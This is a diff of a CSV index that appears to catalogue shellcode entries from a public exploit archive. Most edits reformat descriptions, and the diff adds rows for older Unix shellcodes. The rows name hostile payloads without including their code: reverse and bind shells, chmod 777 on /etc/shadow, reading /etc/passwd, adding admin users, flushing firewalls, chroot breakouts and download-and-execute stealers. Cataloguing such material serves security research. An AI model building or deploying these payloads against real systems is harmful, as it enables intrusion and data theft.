(/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 @@ -472,15 +473,15 @@ id,file,description,date,author,type,platform 35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86 35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 -35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips +35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips 36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips 36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips 36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64 -36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 -36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86 @@ -488,69 +489,69 @@ id,file,description,date,author,type,platform 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator 36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86 36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86 -36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86 +36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86 36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 -36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator -36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 -36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 +36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator +36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 +36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86 -37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86 -37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86 +37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86 +37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86 37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 -37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 +37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86 37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 -37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86 +37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 -37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 -37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86 +37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 +37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86 37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86 37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86 37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86 -37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 +37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64 -38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx +38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z -38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86 +38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator 38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86 38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx -38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 +38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android -38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 +38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64 -38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 +38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator 39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 -39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86 +39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86 39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64 39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86 -39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 +39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux 39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux 39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux 39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86 -39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 +39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm 39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 -39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 -39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 -39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 +39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64 39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 @@ -566,14 +567,14 @@ id,file,description,date,author,type,platform 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator 39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 -39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple 39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows 40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86 +40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86 40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 @@ -583,7 +584,7 @@ id,file,description,date,author,type,platform 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 -40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86 +40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86 40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86 @@ -610,18 +611,69 @@ id,file,description,date,author,type,platform 43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86 +43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc +43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc +43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc +43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc +43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc +43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc +43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc +43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc +43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx +43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86 +43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43630,shellcodes/linux_x86/43630.c,"Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43631,shellcodes/linux_x86/43631.c,"Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43621,shellcodes/solaris_sparc/43621.c,"Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode",2009-01-01,"Claes M. Nyberg",shellcode,solaris_sparc +43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc +43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind TCP Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc +43624,shellcodes/solaris_x86/43624.asm,"Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)",2009-01-01,"John Babio",shellcode,solaris_x86 +43625,shellcodes/solaris_x86/43625.c,"Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,shellcode.com.ar,shellcode,solaris_x86 +43632,shellcodes/bsd_x86/43632.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43634,shellcodes/openbsd_x86/43634.c,"OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86 +43635,shellcodes/bsd_x86/43635.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43636,shellcodes/bsd_x86/43636.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43637,shellcodes/linux_x86/43637.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43638,shellcodes/linux_x86/43638.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43639,shellcodes/linux_x86/43639.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43640,shellcodes/bsd_x86/43640.c,"BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43641,shellcodes/linux_x86/43641.c,"Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)",2009-01-01,dev0id,shellcode,linux_x86 